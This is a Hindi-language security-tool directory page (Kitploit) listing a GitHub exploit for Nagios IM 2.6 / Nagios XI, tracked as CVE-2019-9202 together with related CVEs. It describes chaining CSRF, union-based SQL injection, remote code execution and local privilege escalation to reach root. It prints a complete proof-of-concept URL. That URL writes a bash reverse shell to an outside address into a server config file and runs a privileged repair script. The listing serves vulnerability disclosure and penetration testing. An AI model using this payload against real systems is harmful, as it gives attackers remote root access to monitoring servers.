Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/polict/cve-2019-9202
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubpolict/cve-2019-9202

CVE-2019-9202

Nagios IM 2.6 रिमोट कोड निष्पादन एक्सप्लॉइट: CSRF + SQLi + RCE + LPE --> रिमोट रूट

रिपॉजिटरी देखें
467 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-9202

Nagios IM 2.6 रिमोट कोड निष्पादन शोषण: CSRF + SQLi + RCE + LPE --> रिमोट रूट

विवरण

Cross-Site Request Forgery (CSRF) / प्राधिकरण बाईपास (CVE-2019-9203) को श्रृंखलित करके, Union-आधारित SQL इंजेक्शन (CVE-2019-9204), रिमोट कोड निष्पादन (RCE) (CVE-2019-9202) और स्थानीय विशेषाधिकार वृद्धि (LPE) (CVE-2019-9166) का शोषण करना संभव है, जिससे दूरस्थ Nagios XI सर्वर पर root विशेषाधिकार प्राप्त किए जा सकते हैं।

आवश्यकताएँ

पीड़ित को Nagios XI में प्रमाणित होना आवश्यक है, जहाँ तक मुझे पता है, सबसे कम विशेषाधिकार पर्याप्त हैं।

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

टूल डाउनलोड करें